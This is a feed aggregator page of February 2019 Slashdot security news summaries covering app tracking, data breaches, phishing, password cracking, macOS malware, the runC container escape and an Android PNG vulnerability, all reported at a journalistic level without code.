Feed aggregator

18,000 Android Apps Track Users By Violating Advertising ID Policies

Slashdot security articles - Fri, 02/15/2019 - 16:50
18,000 Android apps with tens or hundreds of millions of installs on the Google Play Store have been found to violate Google's Play Store Advertising ID policy guidance by collecting persistent device identifiers such as serial numbers, IMEI, WiFi MAC addresses, SIM card serial numbers, and sending them to mobile advertising related domains alongside ad IDs. Bleeping Computer reports: AppCensus is an organization based in Berkeley, California, and created by researchers from all over the world with expertise in a wide range of fields, ranging from networking and privacy to security and usability. The project is supported by "grants from the National Science Foundation, the Department of Homeland Security, and the Data Transparency Lab." By highlighting this behavior, AppCensus shows that while users are being offered the option to reset the advertising ID, doing so will not immediately translate into getting a new "identity" because app developers can also use a multitude of other identifiers to keep their tracking and targeting going. Google did not yet respond to a report sent by AppCensus in September 2018 containing a list of 17,000 Android apps that send persistent identifiers together with ad IDs to various advertising networks, also attaching a list of 30 recipient mobile advertising related domains where the various IDs were being sent. While looking at the network packets sent between the apps and these 30 domains, AppCensus observed that "they are either being used to place ads in apps, or track user engagement with ads." In a statement to CNET, a Google spokesperson said: "We take these issues very seriously. Combining Ad ID with device identifiers for the purpose of ads personalization is strictly forbidden. We're constantly reviewing apps -- including those listed in the researcher's report -- and will take action when they do not comply with our policies." Some of the most popular applications found to be violating Google's Usage of Android Adverting ID policies include Clean Master, Subway Surfers, Fliboard, My Talking Tom, Temple Run 2, and Angry Birds Classic. The list goes on and on, and the last app in the "Top 20" list still has over 100 million installations.

Even Years Later, Twitter Doesn't Delete Your Direct Messages

Slashdot security articles - Fri, 02/15/2019 - 16:10
An anonymous reader quotes a report from TechCrunch: Twitter retains direct messages for years, including messages you and others have deleted, but also data sent to and from accounts that have been deactivated and suspended, according to security researcher Karan Saini. Saini found years-old messages in a file from an archive of his data obtained through the website from accounts that were no longer on Twitter. He also reported a similar bug, found a year earlier but not disclosed until now, that allowed him to use a since-deprecated API to retrieve direct messages even after a message was deleted from both the sender and the recipient -- though, the bug wasn't able to retrieve messages from suspended accounts. Direct messages once let users "unsend" messages from someone else's inbox, simply by deleting it from their own. Twitter changed this years ago, and now only allows a user to delete messages from their account. "Others in the conversation will still be able to see direct messages or conversations that you have deleted," Twitter says in a help page. Twitter also says in its privacy policy that anyone wanting to leave the service can have their account "deactivated and then deleted." After a 30-day grace period, the account disappears, along with its data. But, in our tests, we could recover direct messages from years ago -- including old messages that had since been lost to suspended or deleted accounts. By downloading your account's data, it's possible to download all of the data Twitter stores on you. A Twitter spokesperson said the company was "looking into this further to ensure we have considered the entire scope of the issue."

Venezuela's Government Appears To be Trying To Hack Activists With Phishing Pages

Slashdot security articles - Fri, 02/15/2019 - 08:55
Hackers allegedly working for the embattled Venezuelan government tried to trick activists into giving away their passwords to popular services such as Gmail, Facebook, Twitter, and others, according to security researchers. From a report: Last week, the Venezuelan opposition leader Juan Guaido called for citizens to volunteer with the goal of helping international humanitarian organizations deliver aid into the country. President Nicolas Maduro is refusing to accept aid and has erected blocks across a border bridge with Colombia with the military's help. The volunteer efforts were organized around the website voluntariosxvenezuela.com. A week later, on February 11 someone registered an almost identical domain, voluntariosvenezuela[.]com. And on Wednesday, users in Venezuela who were trying to visit the original and official VoluntariosxVenezuela website were redirected to the newer one, according to security firm Kaspersky Lab, as well as Venezuelan users on Twitter.

8-Character Windows NTLM Passwords Can Be Cracked In Under 2.5 Hours

Slashdot security articles - Fri, 02/15/2019 - 02:00
HashCat, an open-source password recovery tool, can now crack an eight-character Windows NTLM password hash in less than 2.5 hours. "Current password cracking benchmarks show that the minimum eight character password, no matter how complex, can be cracked in less than 2.5 hours" using a hardware rig that utilizes eight Nvidia GTX 2080Ti GPUs, explained a hacker who goes by the pseudonym Tinker on Twitter in a DM conversation with The Register. "The eight character password is dead." From the report: It's dead at least in the context of hacking attacks on organizations that rely on Windows and Active Directory. NTLM is an old Microsoft authentication protocol that has since been replaced with Kerberos. According to Tinker, it's still used for storing Windows passwords locally or in the NTDS.dit file in Active Directory Domain Controllers. It's dead at least in the context of hacking attacks on organizations that rely on Windows and Active Directory. NTLM is an old Microsoft authentication protocol that has since been replaced with Kerberos. Tinker estimates that buying the GPU power described would require about $10,000; others have claimed the necessary computer power to crack an eight-character NTLM password hash can be rented in Amazon's cloud for just $25. NIST's latest guidelines say passwords should be at least eight characters long. Some online service providers don't even demand that much. When security researcher Troy Hunt examined the minimum password lengths at various websites last year, he found that while Google, Microsoft and Yahoo set the bar at eight, Facebook, LinkedIn and Twitter only required six. Tinker said the eight character password was used as a benchmark because it's what many organizations recommend as the minimum password length and many corporate IT policies reflect that guidance. So how long is long enough to sleep soundly until the next technical advance changes everything? Tinker recommends a random five-word passphrase, something along the lines of the four-word example popularized by online comic XKCD, "correcthorsebatterystaple." That or whatever maximum length random password via a password management app, with two-factor authentication enabled in either case.

Hacker Who Stole 620 Million Records Strikes Again, Stealing 127 Million More

Slashdot security articles - Thu, 02/14/2019 - 14:03
An anonymous reader quotes a report from TechCrunch: A hacker who stole close to 620 million user records from 16 websites has stolen another 127 million records from eight more websites, TechCrunch has learned. The hacker, whose listing was the previously disclosed data for about $20,000 in bitcoin on a dark web marketplace, stole the data last year from several major sites -- some that had already been disclosed, like more than 151 million records from MyFitnessPal and 25 million records from Animoto. But several other hacked sites on the marketplace listing didn't know or hadn't disclosed yet -- such as 500px and Coffee Meets Bagel. The Register, which first reported the story, said the data included names, email addresses and scrambled passwords, and in some cases other login and account data -- though no financial data was included. Now the same hacker has eight additional marketplace entries after their original listings were pulled offline, including: - 18 million records from travel booking site Ixigo - Live-video streaming site YouNow had 40 million records stolen - Houzz, which recently disclosed a data breach, is listed with 57 million records stolen - Ge.tt had 1.8 million accounts stolen - 450,000 records from cryptocurrency site Coinmama. - Roll20, a gaming site, had 4 million records listed - Stronghold Kingdoms, a multiplayer online game, had 5 million records listed - 1 million records from pet care delivery service PetFlow

Facebook Security Keeps a Detailed 'Lookout' List of Threats, Including Users and Former Employees, and Can Track Their Location

Slashdot security articles - Thu, 02/14/2019 - 12:07
An anonymous reader shares a report: In early 2018, a Facebook user made a public threat on the social network against one of the company's offices in Europe. Facebook picked up the threat, pulled the user's data and determined he was in the same country as the office he was targeting. The company informed the authorities about the threat and directed its security officers to be on the lookout for the user. "He made a veiled threat that 'Tomorrow everyone is going to pay' or something to that effect," a former Facebook security employee told CNBC. The incident is representative of the steps Facebook takes to keep its offices, executives and employees protected, according to nine former Facebook employees who spoke with CNBC. The company mines its social network for threatening comments, and in some cases uses its products to track the location of people it believes present a credible threat. Several of the former employees questioned the ethics of Facebook's security strategies, with one of them calling the tactics "very Big Brother-esque." Other former employees argue these security measures are justified by Facebook's reach and the intense emotions it can inspire. The company has 2.7 billion users across its services. That means that if just 0.01 percent of users make a threat, Facebook is still dealing with 270,000 potential security risks. [...] One of the tools Facebook uses to monitor threats is a "be on lookout" or "BOLO" list, which is updated approximately once a week. The list was created in 2008, an early employee in Facebook's physical security group told CNBC. It now contains hundreds of people, according to four former Facebook security employees who have left the company since 2016. Facebook notifies its security professionals anytime a new person is added to the BOLO list, sending out a report that includes information about the person, such as their name, photo, their general location and a short description of why they were added. In recent years, the security team even had a large monitor that displayed the faces of people on the list, according to a photo CNBC has seen and two people familiar, although Facebook says it no longer operates this monitor.

Personal Information of 14.8 Million 500px Users Exposed In Security Breach

Slashdot security articles - Thu, 02/14/2019 - 02:00
Photo-sharing service 500px has announced that it was the victim of a hack back in July 2018 and that personal data was exposed for all the roughly 14.8 million accounts that existed at the time. PetaPixel reports: In an email sent out to users and an announcement posted to its website, 500px states that it was only on February 8th, 2019, that its team learned of an unauthorized intrusion to its system that occurred on or around July 5th, 2018. The personal data that may have been stolen by the intruder includes first and last names, usernames, email addresses, password hashes (i.e. not plaintext passwords), location (i.e. city, state, country), birth date, and gender. The company has reset all 500px account passwords, so to get back into your account you'll need to pick a new one using the recovery email system. "At this time, there is no indication of unauthorized access to your account, and no evidence that other data associated with your user profile was affected, such as credit card information (which is not stored on our servers), if used to make any purchases, or any other sensitive personal information," 500px says. "We recommend you change your password on any other website or app on which you use a password that is the same as or similar to your password for your 500px account," 500px says.

Your GPS Devices May Stop Working On April 6 If You Don't Or Can't Update Firmware

Slashdot security articles - Wed, 02/13/2019 - 23:00
Zorro shares a report from The Register: Older satnavs and such devices won't be able to use America's Global Positioning System properly after April 6 unless they've been suitably updated or designed to handle a looming epoch rollover. GPS signals from satellites include a timestamp, needed in part to calculate one's location, that stores the week number using ten binary bits. That means the week number can have 210 or 1,024 integer values, counting from zero to 1,023 in this case. Every 1,024 weeks, or roughly every 20 years, the counter rolls over from 1,023 to zero. The first Saturday in April will mark the end of the 1,024th week, after which the counter will spill over from 1,023 to zero. The last time the week number overflowed like this was in 1999, nearly two decades on from the first epoch in January 1980. You can see where this is going. If devices in use today are not designed or patched to handle this latest rollover, they will revert to an earlier year after that 1,024th week in April, causing attempts to calculate position to potentially fail. System and navigation data could even be corrupted, we're warned. U.S. Homeland Security explained the issue in a write-up this week. GPS.gov also notes that the new CNAV and MNAV message formats will use a 13-bit week number, so this issue shouldn't happen again anytime soon. The site recommend users consult the manufacturer of their equipment to make sure they have the proper updates in place.

Game of Thrones Hacker Worked With US Defector To Hack Air Force Employees of Iran

Slashdot security articles - Wed, 02/13/2019 - 16:50
An anonymous reader quotes a report from ZDNet: The U.S. Department of Justice unsealed today espionage-related charges against a former U.S. Air Force service member who defected to Iran and helped the country's hackers target her former Air Force colleagues. Besides charges and an arrest warrant issued in the name of the former USAF service member, the DOJ also indicted four Iranian hackers who supposedly carried out the cyber-attacks acting on information provided by Witt. The most notable of the four Iranian hackers is Behzad Mesri, who U.S. authorities also charged in November 2017 with hacking HBO, stealing scripts for unaired episodes of season 6 of the hit series Game Of Thrones TV show, and later attempting to extort HBO execs for $6 million. But at the heart of today's indictment stands Monica Elfriede Witt, 39, a former US Air Force counter-intelligence special agent specialized in Middle East operations, who served for the Air Force between 1997 and 2008, and later worked as a DOD contractor until 2010 --including for Booz Allen Hamilton, the same defense company where Edward Snowden worked. [...] The DOJ claims Witt has been working ever since with IRGC hacking units to craft and fine-tune cyber-operations against her former Air Force colleagues, some of whom she knew personally. [...] All the five suspects named in the indictment are still at large, believed to be located in Iran. The DOJ says Witt now goes by the names of Fatemah Zahra or Narges Witt.

Shlayer Malware Disables macOS Gatekeeper To Run Unsigned Payloads

Slashdot security articles - Wed, 02/13/2019 - 15:30
A new variant of the multi-stage Shlayer malware known to target macOS users has been observed in the wild, now being capable to escalate privileges using a two-year-old technique and to disable the Gatekeeper protection mechanism to run unsigned second stage payloads. Bleeping Computer reports: This new Shlayer variant unearthed by Carbon Black's Threat Analysis Unit (TAU) targets all macOS releases up to the latest 10.14.3 Mojave, and will arrive on the targets' machines as a DMG, PKG, ISO, or ZIP files, some of them also signed with a valid Apple developer ID to make them look legitimate. Shlayer samples found by TAU also use malicious shell scripts to download additional payloads just like older installments did, and, in the case of samples distributed as DMG images, will surreptitiously launch a .command script in the background after the user launches the fake Flash installer. The malicious script included in the DMG is encoded using base64 and will decrypt a second AES encrypted script which will be executed automatically after being decrypted. One it successfully downloads the second stage malware payload, Shlayer will "to escalate privileges with sudo using a technique invoking /usr/libexec/security_authtrampoline," presented by Patrick Wardle in his Death by 1000 Installers talk at DEFCON 2017. The next step is to download extra payloads which all contain adware according to TAU and it makes sure they'll be able to run on the compromised Mac by disabling the Gatekeeper protection mechanism. After this is accomplished, all extra payloads downloaded and launched by Shlayer will be seen as whitelisted software because the OS will no longer check if they are signed with an Apple developer ID. Also, just in case the malware is not able to disable Gatekeeper on the infected Mac, some of the second stage payloads are also signed with valid developer IDs.

The Stolen Equifax Data Has Never Been Found, Experts Suspect a Spy Scheme

Slashdot security articles - Wed, 02/13/2019 - 14:50
An anonymous reader quotes a report from CNBC: On September 7, 2017, the world heard an alarming announcement from credit ratings giant Equifax: In a brazen cyber-attack, somebody had stolen sensitive personal information from more than 140 million people, nearly half the population of the U.S. It was the consumer data security scandal of the decade. The information included social security numbers, driver's license numbers, information from credit disputes and other personal details. CEO Richard Smith stepped down under fire. Lawmakers changed credit freeze laws and instilled new regulatory oversight of credit ratings agencies. Then, something unusual happened. The data disappeared. Completely. CNBC talked to eight experts, including data "hunters" who scour the dark web for stolen information, senior cybersecurity managers, top executives at financial institutions, senior intelligence officials who played a part in the investigation and consultants who helped support it. All of them agreed that a breach happened, and personal information from 143 million people was stolen. But none of them knows where the data is now. It's never appeared on any hundreds of underground websites selling stolen information. Security experts haven't seen the data used for in any of the ways they'd expect in a theft like this -- not for impersonating victims, not for accessing other websites, nothing. Most experts familiar with the case now believe that the thieves were working for a foreign government, and are using the information not for financial gain, but to try and identify and recruit spies.

Google Play Store App Rejections Up 55% From Last Year, App Suspensions Up 66%

Slashdot security articles - Wed, 02/13/2019 - 14:10
In a year-in-review announcement today, Google said Play Store app rejections went up 55% last year after the OS maker tightened up its app review process. From a report: Similarly, stats for app suspensions also went up, by more than 66%, according to Google, which the company credited to its continued investment in "automated protections and human review processes that play critical roles in identifying and enforcing on bad apps." One of the most significant roles in the automated systems cited by Google in identifying malware is the Google Play Protect service, which is currently included by default with the official Play Store app. Google said this service now scans over 50 billion apps per day, and even goes as far as downloading and scanning every Android app it finds on the internet. [...] Play Store's automated systems are now getting better and better at detecting threats, so much so that Google is now seeing clear patterns. "We find that over 80% of severe policy violations are conducted by repeat offenders and abusive developer networks," Ahn said. "When malicious developers are banned, they often create new accounts or buy developer accounts on the black market in order to come back to Google Play."

Swiss E-voting Trial Offers $150,000 in Bug Bounties To Hackers

Slashdot security articles - Wed, 02/13/2019 - 08:45
The Swiss government is offering bug bounties of up to CHF 50,000 (around $50,000) to anyone who can expose vulnerabilities in its internet-based e-voting system in a test later this month. From a report: In total, 150,000 CHF (around $150,000) will be up for grabs for any white hat hackers who register for the "Public Intrusion Test" (PIT). The Swiss Post system will be open for a dummy election between February 24th and March 24th, the length of a typical Swiss federal vote, during which time any registered "white hat" hackers will be free to discover and report vulnerabilities. This PIT comes as the Swiss government is planning to expand its e-voting capabilities by October 2019 to two thirds of the 26 cantons that make up the Swiss Confederation. The country has conducted more than 300 trials of e-voting systems over the past 14 years, but current rules limit the amount of electronic votes to 10 percent of the total for referendums and 30 percent for constitutional amendments. However, the expansion plans have been met by opposition by politicians who claim current e-voting systems are insecure, expensive, and prone to manipulation.

Facebook Glitch Lets You Search For Pictures of Your Female Friends, But Not Your Male Ones

Slashdot security articles - Tue, 02/12/2019 - 14:50
Belgian security researcher Inti De Ceukelaire has found an unusual glitch in Facebook's search function. Facebook lets you search for photos of your female friends, but refuses to let you look up pictures of your male friends. The Next Web has managed to replicate the glitch across several Facebook accounts. "When you type 'photos of my female friends' into the search bar, Facebook will return a seemingly-random selection of photos from your female friends," reports TNW. From the report: Switching out "female" with "male" returns something completely different. Instead of pictures of friends from within your social network, you're instead shown a selection of pictures from across the social network. In our experience, these came from accounts and groups we did not follow. Facebook will also ask if you meant to type "female," assuming you mistyped your query. If you're feeling an overwhelming sense of deja vu, you're not alone. The predecessor to Facebook was a deeply unsavory site called Facemash that allowed Harvard University students to rate their female colleagues based on perceived physical attractiveness. It's a far cry from the now-hugely popular social network site, used by millennials and grandparents alike. Facebook has desperately tried to shed this deeply questionable part of its history for something more saccharine and innocuous. [...] The main difference though is that this is almost certainly an innocent mistake, rather than the product of dorm-room shenanigans.

Researchers Use Intel SGX To Put Malware Beyond the Reach of Antivirus Software

Slashdot security articles - Tue, 02/12/2019 - 14:10
An anonymous reader shares an excerpt from an Ars Technica report: Researchers have found a way to run malicious code on systems with Intel processors in such a way that the malware can't be analyzed or identified by antivirus software, using the processor's own features to protect the bad code. As well as making malware in general harder to examine, bad actors could use this protection to, for example, write ransomware applications that never disclose their encryption keys in readable memory, making it substantially harder to recover from attacks. The research, performed at Graz University of Technology by Michael Schwarz, Samuel Weiser, and Daniel Gruss (one of the researchers behind last year's Spectre attack), uses a feature that Intel introduced with its Skylake processors called SGX ("Software Guard eXtensions"). SGX enables programs to carve out enclaves where both the code and the data the code works with are protected to ensure their confidentiality (nothing else on the system can spy on them) and integrity (any tampering with the code or data can be detected). The contents of an enclave are transparently encrypted every time they're written to RAM and decrypted upon being read. The processor governs access to the enclave memory: any attempt to access the enclave's memory from code outside the enclave is blocked; the decryption and encryption only occurs for the code within the enclave. SGX has been promoted as a solution to a range of security concerns when a developer wants to protect code, data, or both, from prying eyes. For example, an SGX enclave running on a cloud platform could be used to run custom proprietary algorithms, such that even the cloud provider cannot determine what the algorithms are doing. On a client computer, the SGX enclave could be used in a similar way to enforce DRM (digital rights management) restrictions; the decryption process and decryption keys that the DRM used could be held within the enclave, making them unreadable to the rest of the system. There are biometric products on the market that use SGX enclaves for processing the biometric data and securely storing it such that it can't be tampered with. SGX has been designed for this particular threat model: the enclave is trusted and contains something sensitive, but everything else (the application, the operating system, and even the hypervisor) is potentially hostile. While there have been attacks on this threat model (for example, improperly written SGX enclaves can be vulnerable to timing attacks or Meltdown-style attacks), it appears to be robust as long as certain best practices are followed.

Hackers Wipe US Servers of Email Provider VFEmail

Slashdot security articles - Tue, 02/12/2019 - 12:50
Hackers have breached the severs of email provider VFEmail.net and wiped the data from all its US servers, destroying all US customers' data in the process. From a report: The attack took place yesterday, February 11, and was detected after the company's site and webmail client went down without notice. "At this time, the attacker has formatted all the disks on every server," the company said yesterday. "Every VM is lost. Every file server is lost, every backup server is lost. This was more than a multi-password via SSH exploit, and there was no ransom. Just attack and destroy," VFEmail said. The company's staff is now working to recover user emails, but as things stand right now, all data for US customers appears to have been deleted for good and gone into /dev/null.

'You've Won $72 Million and a Mercedes Benz': Phone Scammer Gets 6 Years in Prison After He Made the Mistake of Calling William Webster, Ex-FBI and CIA Director

Slashdot security articles - Tue, 02/12/2019 - 11:31
Reader McGruber writes: The Washington Post has an amusing story about phone scammer Keniel A. Thomas, who made the mistake of calling William H. Webster. Thomas told 90-year-old Webster that he had won $72 million and a new Mercedes Benz in the Mega Millions lottery, but that he needed to send $50,000 in taxes and fees to get his money. Thomas also told Webster he'd done his research on the top winner. "You're a great man," the scammer cajoled. "You was a judge, you was an attorney, you was a basketball player, you were in the U.S. Navy, homeland security. I know everything about you. I even seen your photograph, and I seen your precious wife." Thomas's research didn't turn up everything. He didn't learn that the man he was calling was the former director of the FBI and the CIA, the only person ever to hold both jobs. And he didn't know that Webster would call him back the next day with the FBI listening in. Thomas was arrested in late 2017, after he landed in New York on a flight from Jamaica. He pleaded guilty in October and faced a prison term of 33 to 41 months under federal sentencing guidelines. But with Webster and his wife in the courtroom, Chief U.S. District Judge Beryl Howell on Friday added another 2 years to Thomas's sentence, giving him nearly six years to serve. Howell said that the scam qualified as "organized criminal activity" and that Thomas posed "a threat to a family member of the victim."

Xiaomi's Popular Electric Scooter M365 Can Be Hacked To Speed Up or Stop

Slashdot security articles - Tue, 02/12/2019 - 06:45
The fleets of electric scooters that have inundated cities are alarming enough as is. Now add cybersercurity concerns to the list: Researchers from the mobile security firm Zimperium are warning that Xiaomi's popular M365 scooter model has a worrying bug. From a report: The flaw could allow an attacker to remotely take over any of the scooters to control crucial things like, ahem, acceleration and braking. Rani Idan, Zimperium's director of software research, says he found and was able to exploit the flaw within hours of assessing the M365's security. His analysis found that the scooters contain three software components: battery management, firmware that coordinates between hardware and software, and a Bluetooth module that lets users communicate with their scooter via a smartphone app. The latter leaves the devices woefully exposed. Idan quickly found that he could connect to the scooter via Bluetooth without being asked to enter a password or otherwise authenticate. From there, he could go a step further and install firmware on the scooter without the system checking that this new software was an official, trusted Xiaomi update. This means that an attacker could easily put malware on a scooter, giving herself full command over it. "I was able to control any of the scooter features without authentication and install malicious firmware," Idan says. "An attacker could brake suddenly, or accelerate a person into traffic, or whatever the worst case scenario you can imagine."

Android Phones Can Be Hacked Remotely By Viewing Malicious PNG Image

Slashdot security articles - Mon, 02/11/2019 - 17:30
An innocent-looking image -- sent either via the internet or text -- could open your Android phone up to hacking. "While this certainly doesn't apply to all images, Google discovered that a maliciously crafted PNG image could be used to hijack a wide variety of Androids -- those running Android Nougat (7.0), Oreo (8.0), and even the latest Android OS Pie (9.0)," reports CSO Online. From the report: The latest bulletin lists 42 vulnerabilities in total -- 11 of which are rated as critical. The most severe critical flaw is in Framework; it "could enable a remote attacker using a specially crafted PNG file to execute arbitrary code within the context of a privileged process." Although Google had no report of the security flaws being actively exploited, it remains to be seen if and how long it will take before attackers use the flaw for real-world attacks. Android owners were urged to patch as soon as security updates becomes available. But let's get real: Even if your Android still receives security updates, there's no telling how long it will be (weeks or months) before manufacturers and carriers get it together to push out the patches.

Doomsday Docker Security Hole Uncovered

Slashdot security articles - Mon, 02/11/2019 - 13:30
An anonymous reader quotes a report from ZDNet: One of the great security fears about containers is that an attacker could infect a container with a malicious program, which could escape and attack the host system. Well, we now have a security hole that could be used by such an attack: RunC container breakout, CVE-2019-5736. RunC is the underlying container runtime for Docker, Kubernetes, and other container-dependent programs. It's an open-source command-line tool for spawning and running containers. Docker originally created it. Today, it's an Open Container Initiative (OCI) specification. It's widely used. Chance are, if you're using containers, you're running them on runC. According to Aleksa Sarai, a SUSE container senior software engineer and a runC maintainer, security researchers Adam Iwaniuk and Borys Popawski discovered a vulnerability, which "allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command (it doesn't matter if the command is not attacker-controlled) as root." To do this, an attacker has to place a malicious container within your system. But, this is not that difficult. Lazy sysadmins often use the first container that comes to hand without checking to see if the software within that container is what it purports to be. Red Hat technical product manager for containers, Scott McCarty, warned: "The disclosure of a security flaw (CVE-2019-5736) in runc and docker illustrates a bad scenario for many IT administrators, managers, and CxOs. Containers represent a move back toward shared systems where applications from many different users all run on the same Linux host. Exploiting this vulnerability means that malicious code could potentially break containment, impacting not just a single container, but the entire container host, ultimately compromising the hundreds-to-thousands of other containers running on it. While there are very few incidents that could qualify as a doomsday scenario for enterprise IT, a cascading set of exploits affecting a wide range of interconnected production systems qualifies...and that's exactly what this vulnerability represents."
Syndicate content